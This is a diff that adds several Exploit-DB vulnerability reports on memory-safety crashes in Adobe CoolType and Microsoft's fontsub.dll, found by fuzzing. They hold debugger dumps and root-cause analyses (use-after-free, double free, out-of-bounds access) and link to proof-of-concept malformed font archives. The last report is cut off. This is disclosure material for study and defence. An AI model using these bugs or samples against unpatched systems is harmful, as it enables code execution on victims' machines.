+07 012f9f70 54842786 CoolType!CTGetVersion+0x4abc4
+08 012fa224 548ec8bd CoolType!CTGetVersion+0x215ee
+09 012fb768 548ed5de CoolType!CTGetVersion+0xcb725
+0a 012fc830 548243e6 CoolType!CTGetVersion+0xcc446
+0b 012fc92c 54823fda CoolType!CTGetVersion+0x324e
+0c 012fc940 54904037 CoolType!CTGetVersion+0x2e42
+0d 012fc980 0c146986 CoolType!CTGetVersion+0xe2e9f
+0e 012fc9f4 0c16008f AGM!AGMGetVersion+0x23eb86
+0f 012fca40 0c16039c AGM!AGMGetVersion+0x25828f
+10 012fca6c 0c1603fd AGM!AGMGetVersion+0x25859c
+11 012fcaac 0c129704 AGM!AGMGetVersion+0x2585fd
+12 012fcd48 62c11f7a AGM!AGMGetVersion+0x221904
+13 012fcd88 62c1fde1 BIB!BIBInitialize4+0x7ff
+14 012fcd90 62c11ee1 BIB!BIBLockSmithUnlockImpl+0x48c9
+15 00000000 00000000 BIB!BIBInitialize4+0x766
+--- cut ---
+
+The value of ECX is loaded from EAX:
+
+--- cut ---
+0:000> u @$scopeip-7
+CoolType!CTGetVersion+0xafcc8:
+548d0e60 8b4808          mov     ecx,dword ptr [eax+8]
+548d0e63 ff7004          push    dword ptr [eax+4]
+548d0e66 51              push    ecx
+548d0e67 ff510c          call    dword ptr [ecx+0Ch]
+548d0e6a 83c40c          add     esp,0Ch
+548d0e6d 85c0            test    eax,eax
+548d0e6f 7405            je      CoolType!CTGetVersion+0xafcde (548d0e76)
+548d0e71 33c0            xor     eax,eax
+--- cut ---
+
+And it is clear that almost none of the memory under [EAX] is initialized at the time of the crash:
+
+--- cut ---
+0:000> dd eax
+84ca7ef4  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+84ca7f04  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c00000
+84ca7f14  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+84ca7f24  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+84ca7f34  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+84ca7f44  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+84ca7f54  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+84ca7f64  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47260.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47261.txt b/exploits/windows/dos/47261.txt
new file mode 100644
index 000000000..c96585a07
--- /dev/null
+++ b/exploits/windows/dos/47261.txt
@@ -0,0 +1,77 @@
+-----=====[ Background ]=====-----
+
+The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
+
+The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
+
+-----=====[ Description ]=====-----
+
+The declaration of the public MergeFontPackage() function is as follows:
+
+--- cut ---
+unsigned long MergeFontPackage(
+  const unsigned char  *puchMergeFontBuffer,
+  const unsigned long  ulMergeFontBufferSize,
+  const unsigned char  *puchFontPackageBuffer,
+  const unsigned long  ulFontPackageBufferSize,
+  unsigned char        **ppuchDestBuffer,
+  unsigned long        *pulDestBufferSize,
+  unsigned long        *pulBytesWritten,
+  const unsigned short usMode,
+  CFP_ALLOCPROC        lpfnAllocate,
+  CFP_REALLOCPROC      lpfnReAllocate,
+  CFP_FREEPROC         lpfnFree,
+  void                 *lpvReserved
+);
+--- cut ---
+
+The fifth, sixth and seventh parameters (ppuchDestBuffer, pulDestBufferSize and pulBytesWritten) are used to return a pointer to an output buffer, its size and the length of the actual content written by the API, if the routine succeeds. However, during our fuzzing, we have encountered a number of crashes caused by the function returning a pointer to a freed memory region through ppuchDestBuffer, and an invalid value in pulDestBufferSize.
+
+Thanks to the fact that the function uses a client-provided allocator, we can observe the heap allocations being made during the library runtime. If we compile the testing harness in Debug mode and run it against one of the input samples (preferably with PageHeap enabled), we should see output similar to the following:
+
+--- cut ---
+[...]
+[+] realloc(0000000000000000, 0x48b8) ---> 000001A1F1942740
+[+] realloc(000001A1F1942740, 0x4ffd) ---> 000001A1F1948FF0
+[+] realloc(000001A1F1948FF0, 0x57fc) ---> 000001A1F194F800
+[+] realloc(000001A1F194F800, 0x60c8) ---> 000001A1F1956F30
+[+] realloc(000001A1F1956F30, 0x6a75) ---> 000001A1F195E580
+[+] realloc(000001A1F195E580, 0x751a) ---> 000001A1F1966AE0
+[+] realloc(000001A1F1966AE0, 0x80cf) ---> 000001A1F196FF20
+[+] realloc(000001A1F196FF20, 0x8db0) ---> 000001A1F1979240
+[+] realloc(000001A1F1979240, 0x9bdb) ---> 000001A1F1983420
+[+] realloc(000001A1F1983420, 0xab70) ---> 000001A1F198E480
+[+] realloc(000001A1F198E480, 0xbc94) ---> 000001A1F199A360
+[+] MergeFontPackage returned buffer 000001A1F1942740, buffer size 0x48b8, bytes written 0xae5c
+--- cut ---
+
+... followed by a crash while trying to access the 0x1A1F1942740 address:
+
+--- cut ---
+(2664.3028): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+VCRUNTIME140D!memcpy_repmovs+0xe:
+00007fff`a00b16ee f3a4            rep movs byte ptr [rdi],byte ptr [rsi]
+0:000> ? rsi
+Evaluate expression: 1795054380864 = 000001a1`f1942740
+0:000> dd rsi
+000001a1`f1942740  ???????? ???????? ???????? ????????
+000001a1`f1942750  ???????? ???????? ???????? ????????
+000001a1`f1942760  ???????? ???????? ???????? ????????
+000001a1`f1942770  ???????? ???????? ???????? ????????
+000001a1`f1942780  ???????? ???????? ???????? ????????
+000001a1`f1942790  ???????? ???????? ???????? ????????
+000001a1`f19427a0  ???????? ???????? ???????? ????????
+000001a1`f19427b0  ???????? ???????? ???????? ????????
+--- cut ---
+
+In the output log, we can see that a buffer of size 0x48b8 was initially allocated at address 0x1A1F1942740, but was then reallocated multiple times to incrementally grow it up to 0xbc94 bytes. However, the output values of ppuchDestBuffer and pulDestBufferSize are not updated accordingly, and so they contain the stale data written after the first allocation. Interestingly, the problem doesn't seem to affect the third output argument -- pulBytesWritten, which is correctly updated to the most recent value, and is thus bigger then *pulDestBufferSize, which should normally never happen.
+
+Returning such a stale pointer may lead to a use-after-free condition, and/or a double free when the client software decides to free the buffer on its own. This in turn may potentially lead to arbitrary code execution in the context of the fontsub.dll client process.
+
+The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. Attached are 3 proof of concept malformed font files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47261.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47262.txt b/exploits/windows/dos/47262.txt
new file mode 100644
index 000000000..6b603252a
--- /dev/null
+++ b/exploits/windows/dos/47262.txt
@@ -0,0 +1,69 @@
+-----=====[ Background ]=====-----
+
+The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
+
+The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
+
+-----=====[ Description ]=====-----
+
+We have encountered the following crash in fontsub!GetGlyphIdx:
+
+--- cut ---
+(4a54.4cd8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+FONTSUB!GetGlyphIdx+0x9e:
+00007fff`9f4bbf96 0fb70447        movzx   eax,word ptr [rdi+rax*2] ds:00000155`3b64af80=????
+
+0:000> ? rdi
+Evaluate expression: 1465580302336 = 00000155`3b64b000
+
+0:000> ? rax
+Evaluate expression: -64 = ffffffff`ffffffc0
+
+0:000> dd rdi
+00000155`3b64b000  006a0010 006c006b 0111006d 00f80085
+00000155`3b64b010  011100fd 02af02ae 028b02b0 028d028c
+00000155`3b64b020  02e00071 01060000 01000000 00000000
+00000155`3b64b030  01020000 00020000 00000000 00000000
+00000155`3b64b040  00000000 00010000 03040000 07080506
+00000155`3b64b050  0b0c090a 0f100d0e 13141112 17181516
+00000155`3b64b060  1b1c191a 1f201d1e 23242122 27282526
+00000155`3b64b070  2b2c292a 2f302d2e 33343132 37383536
+
+0:000> !heap -p -a rdi
+    address 000001553b64b000 found in
+    _DPH_HEAP_ROOT @ 1553b5c1000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                             1553b5c2af8:      1553b64b000            1ff88 -      1553b64a000            21000
+    00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
+    00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
+    00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
+    00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
+    00007fffcca398f0 msvcrt!malloc+0x0000000000000070
+    00007fff9f4bfd1e FONTSUB!Mem_Alloc+0x0000000000000012
+    00007fff9f4bc08d FONTSUB!ReadAllocCmapFormat4Ids+0x00000000000000d1
+    00007fff9f4bc4d1 FONTSUB!ReadAllocCmapFormat4+0x0000000000000149
+    00007fff9f4c31d8 FONTSUB!MakeKeepGlyphList+0x0000000000000430
+    00007fff9f4b6c00 FONTSUB!CreateDeltaTTFEx+0x0000000000000168
+    00007fff9f4b6a63 FONTSUB!CreateDeltaTTF+0x00000000000002cb
+    00007fff9f4b132a FONTSUB!CreateFontPackage+0x000000000000015a
+[...]
+
+0:000> k
+ # Child-SP          RetAddr           Call Site
+00 00000001`f4dfd660 00007fff`9f4c322a FONTSUB!GetGlyphIdx+0x9e
+01 00000001`f4dfd6b0 00007fff`9f4b6c00 FONTSUB!MakeKeepGlyphList+0x482
+02 00000001`f4dfd930 00007fff`9f4b6a63 FONTSUB!CreateDeltaTTFEx+0x168
+03 00000001`f4dfda50 00007fff`9f4b132a FONTSUB!CreateDeltaTTF+0x2cb
+04 00000001`f4dfdb90 00007ff6`1a8a85d1 FONTSUB!CreateFontPackage+0x15a
+[...]
+--- cut ---
+
+The root cause of the crash seems to be a negative index into the glyph ID array, which was not anticipated by the developer. Additionally, we've encountered a few cases where the index is negative, but the base address of the array is also NULL, resulting in attempting to access addresses close to 0xfffffffffffffffe.
+
+The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to disclose sensitive data from the process heap. It is easiest to reproduce with PageHeap enabled (with the "Backward" option on), but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47262.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47263.txt b/exploits/windows/dos/47263.txt
new file mode 100644
index 000000000..06ddbd9c2
--- /dev/null
+++ b/exploits/windows/dos/47263.txt
@@ -0,0 +1,62 @@
+-----=====[ Background ]=====-----
+
+The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
+
+The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
+
+-----=====[ Description ]=====-----
+
+We have encountered the following crash in fontsub!MergeFormat12Cmap:
+
+--- cut ---
+=======================================
+VERIFIER STOP 0000000000000007: pid 0x2ADC: Heap block already freed. 
+
+	000001F435091000 : Heap handle for the heap owning the block.
+	000001F4350969C0 : Heap block being freed again.
+	00000000000001BC : Size of the heap block.
+	0000000000000000 : Not used
+
+
+=======================================
+This verifier stop is not continuable. Process will be terminated 
+when you use the `go' debugger command.
+
+=======================================
+
+(2adc.5c10): Break instruction exception - code 80000003 (first chance)
+vrfcore!VerifierStopMessageEx+0x7dc:
+00007fff`9b90263c cc              int     3
+ 
+0:000> k
+ # Child-SP          RetAddr           Call Site
+00 00000093`7bbcc730 00007fff`9b908540 vrfcore!VerifierStopMessageEx+0x7dc
+01 00000093`7bbcca90 00007fff`9b7f619b vrfcore!VfCoreRedirectedStopMessage+0x90
+02 00000093`7bbccb20 00007fff`9b7f4eb0 verifier!VerifierStopMessage+0xbb
+03 00000093`7bbccbd0 00007fff`9b7f2582 verifier!AVrfpDphReportCorruptedBlock+0x1c0
+04 00000093`7bbccc90 00007fff`9b7f2623 verifier!AVrfpDphFindBusyMemoryNoCheck+0x6a
+05 00000093`7bbcccf0 00007fff`9b7f27e9 verifier!AVrfpDphFindBusyMemory+0x1f
+06 00000093`7bbccd30 00007fff`9b7f41bd verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x25
+07 00000093`7bbccd60 00007fff`cf653ab8 verifier!AVrfDebugPageHeapFree+0x8d
+08 00000093`7bbccdc0 00007fff`cf58ae08 ntdll!RtlDebugFreeHeap+0x3c
+09 00000093`7bbcce20 00007fff`cf58f0c9 ntdll!RtlpFreeHeap+0xa8
+0a 00000093`7bbcd050 00007fff`9b90bf42 ntdll!RtlFreeHeap+0x409
+0b 00000093`7bbcd100 00007fff`cca3984c vrfcore!VfCoreRtlFreeHeap+0x22
+0c 00000093`7bbcd150 00007fff`aa5491fe msvcrt!free+0x1c
+0d 00000093`7bbcd180 00007fff`aa5496f8 FONTSUB!MergeFormat12Cmap+0x12e
+0e 00000093`7bbcd250 00007fff`aa54b046 FONTSUB!MergeCmapTables+0x444
+0f 00000093`7bbcd330 00007fff`aa54baac FONTSUB!MergeFonts+0x5a6
+10 00000093`7bbcd4e0 00007fff`aa5414b2 FONTSUB!MergeDeltaTTF+0x3ec
+11 00000093`7bbcd620 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132
+[...]
+--- cut ---
+
+A similar double-free crash was also observed at FONTSUB!MergeFormat12Cmap+0x13b, which is the second free() call directly after a MakeFormat12MergedGlyphList() call.
+
+The root cause of the crash seems to be the fact that in case of an error, the MakeFormat12MergedGlyphList() function frees the buffer pointed to by its first/third argument, and then its caller, MergeFormat12Cmap(), also unconditionally frees both buffers.
+
+The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47263.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47264.txt b/exploits/windows/dos/47264.txt
new file mode 100644
index 000000000..537cbce07
--- /dev/null
+++ b/exploits/windows/dos/47264.txt
@@ -0,0 +1,62 @@
+-----=====[ Background ]=====-----
+
+The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
+
+The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
+
+-----=====[ Description ]=====-----
+
+We have encountered the following crash in fontsub!FixSbitSubTables:
+
+--- cut ---
+(8ec.5f20): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+FONTSUB!FixSbitSubTables+0x9a9:
+00007fff`b4841371 6644892446      mov     word ptr [rsi+rax*2],r12w ds:0000023c`a6765000=????
+
+0:000> ? rsi
+Evaluate expression: 2459514064800 = 0000023c`a6764fa0
+
+0:000> ? rax
+Evaluate expression: 48 = 00000000`00000030
+
+0:000> ? r12w
+Evaluate expression: 0 = 00000000`00000000
+
+0:000> !heap -p -a rsi
+    address 0000023ca6764fa0 found in
+    _DPH_HEAP_ROOT @ 23ca6681000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                             23ca6683888:      23ca6764fa0               60 -      23ca6764000             2000
+          unknown!printable
+    00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
+    00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
+    00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
+    00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
+    00007fffcca398f0 msvcrt!malloc+0x0000000000000070
+    00007fffb483fd1e FONTSUB!Mem_Alloc+0x0000000000000012
+    00007fffb48412ac FONTSUB!FixSbitSubTables+0x00000000000008e4
+    00007fffb4841a5a FONTSUB!FixSbitSubTableArray+0x00000000000001f6
+    00007fffb4842460 FONTSUB!ModSbit+0x0000000000000520
+    00007fffb48370aa FONTSUB!CreateDeltaTTFEx+0x0000000000000612
+    00007fffb4836a63 FONTSUB!CreateDeltaTTF+0x00000000000002cb
+    00007fffb483132a FONTSUB!CreateFontPackage+0x000000000000015a
+[...]
+ 
+0:000> k
+ # Child-SP          RetAddr           Call Site
+00 000000b1`2ccfd580 00007fff`b4841a5a FONTSUB!FixSbitSubTables+0x9a9
+01 000000b1`2ccfd6c0 00007fff`b4842460 FONTSUB!FixSbitSubTableArray+0x1f6
+02 000000b1`2ccfd7e0 00007fff`b48370aa FONTSUB!ModSbit+0x520
+03 000000b1`2ccfd920 00007fff`b4836a63 FONTSUB!CreateDeltaTTFEx+0x612
+04 000000b1`2ccfda40 00007fff`b483132a FONTSUB!CreateDeltaTTF+0x2cb
+05 000000b1`2ccfdb80 00007ff6`1a8a85d1 FONTSUB!CreateFontPackage+0x15a
+[...]
+--- cut ---
+
+The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 4 proof of concept malformed font files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47264.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47265.txt b/exploits/windows/dos/47265.txt
new file mode 100644
index 000000000..dcc259e9a
--- /dev/null
+++ b/exploits/windows/dos/47265.txt
@@ -0,0 +1,60 @@
+-----=====[ Background ]=====-----
+
+The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
+
+The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
+
+-----=====[ Description ]=====-----
+
+We have encountered crashes in fontsub!ReadTableIntoStructure similar to the following:
+
+--- cut ---
+(7ac.378c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+FONTSUB!ReadTableIntoStructure+0x378:
+00007fff`c0874150 6689540110      mov     word ptr [rcx+rax+10h],dx ds:000001f7`a7429010=????
+
+0:000> ? rcx
+Evaluate expression: 32 = 00000000`00000020
+
+0:000> ? rax
+Evaluate expression: 2163174707168 = 000001f7`a7428fe0
+
+0:000> ? dx
+Evaluate expression: 3 = 00000000`00000003
+
+0:000> !heap -p -a rax
+    address 000001f7a7428fe0 found in
+    _DPH_HEAP_ROOT @ 1f7a7271000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                             1f7a7276c98:      1f7a7428fe0               20 -      1f7a7428000             2000
+    00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
+    00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
+    00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
+    00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
+    00007fffcca398f0 msvcrt!malloc+0x0000000000000070
+    00007fffc086fd1e FONTSUB!Mem_Alloc+0x0000000000000012
+    00007fffc0875562 FONTSUB!MergeEblcEbdtTables+0x0000000000000b02
+    00007fffc086b0a3 FONTSUB!MergeFonts+0x0000000000000603
+    00007fffc086baac FONTSUB!MergeDeltaTTF+0x00000000000003ec
+    00007fffc08614b2 FONTSUB!MergeFontPackage+0x0000000000000132
+[...]
+ 
+0:000> k
+ # Child-SP          RetAddr           Call Site
+00 000000d8`664fd3d0 00007fff`c0875599 FONTSUB!ReadTableIntoStructure+0x378
+01 000000d8`664fd480 00007fff`c086b0a3 FONTSUB!MergeEblcEbdtTables+0xb39
+02 000000d8`664fd690 00007fff`c086baac FONTSUB!MergeFonts+0x603
+03 000000d8`664fd840 00007fff`c08614b2 FONTSUB!MergeDeltaTTF+0x3ec
+04 000000d8`664fd980 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132
+[...]
+--- cut ---
+
+In total, we have discovered crashes in four different locations inside the ReadTableIntoStructure() function.
+
+The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 4 proof of concept malformed font files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47265.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47266.txt b/exploits/windows/dos/47266.txt
new file mode 100644
index 000000000..d8bbf6edc
--- /dev/null
+++ b/exploits/windows/dos/47266.txt
@@ -0,0 +1,59 @@
+-----=====[ Background ]=====-----
+
+The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
+
+The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
+
+-----=====[ Description ]=====-----
+
+We have encountered the following crash in fontsub!ReadAllocFormat12CharGlyphMapList:
+
+--- cut ---
+(5a30.397c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+FONTSUB!ReadAllocFormat12CharGlyphMapList+0x13d:
+00007fff`c086cf8d 448904c8        mov     dword ptr [rax+rcx*8],r8d ds:00000225`050b9000=????????
+
+0:000> ? rax
+Evaluate expression: 2358021689232 = 00000225`050b8f90
+
+0:000> ? rcx
+Evaluate expression: 14 = 00000000`0000000e
+
+0:000> ? r8d
+Evaluate expression: 4294967286 = 00000000`fffffff6
+
+0:000> !heap -p -a rax
+    address 00000225050b8f90 found in
+    _DPH_HEAP_ROOT @ 22505011000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                             22505012478:      225050b8f90               68 -      225050b8000             2000
+    00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
+    00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
+    00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
+    00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
+    00007fffcca398f0 msvcrt!malloc+0x0000000000000070
+    00007fffc086fd1e FONTSUB!Mem_Alloc+0x0000000000000012
+    00007fffc086cf24 FONTSUB!ReadAllocFormat12CharGlyphMapList+0x00000000000000d4
+    00007fffc08706cd FONTSUB!ModCmap+0x0000000000000459
+    00007fffc0866eab FONTSUB!CreateDeltaTTFEx+0x0000000000000413
+    00007fffc0866a63 FONTSUB!CreateDeltaTTF+0x00000000000002cb
+    00007fffc086132a FONTSUB!CreateFontPackage+0x000000000000015a
+[...]
+ 
+0:000> k
+ # Child-SP          RetAddr           Call Site
+00 000000ad`62cfd4b0 00007fff`c08706cd FONTSUB!ReadAllocFormat12CharGlyphMapList+0x13d
+01 000000ad`62cfd520 00007fff`c0866eab FONTSUB!ModCmap+0x459
+02 000000ad`62cfd660 00007fff`c0866a63 FONTSUB!CreateDeltaTTFEx+0x413
+03 000000ad`62cfd780 00007fff`c086132a FONTSUB!CreateDeltaTTF+0x2cb
+04 000000ad`62cfd8c0 00007ff6`1a8a85d1 FONTSUB!CreateFontPackage+0x15a
+[...]
+--- cut ---
+
+The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47266.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47267.txt b/exploits/windows/dos/47267.txt
new file mode 100644
index 000000000..ed5b11a77
--- /dev/null
+++ b/exploits/windows/dos/47267.txt
@@ -0,0 +1,61 @@
+-----=====[ Background ]=====-----
+
+The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
+
+The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
+
+-----=====[ Description ]=====-----
+
+We have encountered the following crash in fontsub!WriteTableFromStructure:
+
+--- cut ---
+(3890.25ac): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+FONTSUB!WriteTableFromStructure+0x6e:
+00007fff`aa544326 0fb74810        movzx   ecx,word ptr [rax+10h] ds:000001ac`2d48a000=????
+
+0:000> dd rax
+000001ac`2d489ff0  d0d0d0c0 d0d0d0d0 d0d0d0d0 d0d0d0d0
+000001ac`2d48a000  ???????? ???????? ???????? ????????
+000001ac`2d48a010  ???????? ???????? ???????? ????????
+000001ac`2d48a020  ???????? ???????? ???????? ????????
+000001ac`2d48a030  ???????? ???????? ???????? ????????
+000001ac`2d48a040  ???????? ???????? ???????? ????????
+000001ac`2d48a050  ???????? ???????? ???????? ????????
+000001ac`2d48a060  ???????? ???????? ???????? ????????
+
+0:000> !heap -p -a rax
+    address 000001ac2d489ff0 found in
+    _DPH_HEAP_ROOT @ 1ac2d041000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                             1ac2d0495b0:      1ac2d489ff0                1 -      1ac2d489000             2000
+    00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
+    00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
+    00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
+    00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
+    00007fffcca398f0 msvcrt!malloc+0x0000000000000070
+    00007fffaa53fd1e FONTSUB!Mem_Alloc+0x0000000000000012
+    00007fffaa545562 FONTSUB!MergeEblcEbdtTables+0x0000000000000b02
+    00007fffaa53b0a3 FONTSUB!MergeFonts+0x0000000000000603
+    00007fffaa53baac FONTSUB!MergeDeltaTTF+0x00000000000003ec
+    00007fffaa5314b2 FONTSUB!MergeFontPackage+0x0000000000000132
+[...]
+ 
+0:000> k
+ # Child-SP          RetAddr           Call Site
+00 00000078`dc2fd380 00007fff`aa545634 FONTSUB!WriteTableFromStructure+0x6e
+01 00000078`dc2fd490 00007fff`aa53b0a3 FONTSUB!MergeEblcEbdtTables+0xbd4
+02 00000078`dc2fd6a0 00007fff`aa53baac FONTSUB!MergeFonts+0x603
+03 00000078`dc2fd850 00007fff`aa5314b2 FONTSUB!MergeDeltaTTF+0x3ec
+04 00000078`dc2fd990 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132
+[...]
+--- cut ---
+
+The root cause of the crash seems to be the fact that the MergeEblcEbdtTables() function may allocate a 0-sized buffer and pass it to WriteTableFromStructure() as one of the fields of a structure passed through the fifth argument, but the WriteTableFromStructure() function assumes that the buffer is at least 32 bytes long, and unconditionally reads from it at offset 16, and other offsets later on in the routine.
+
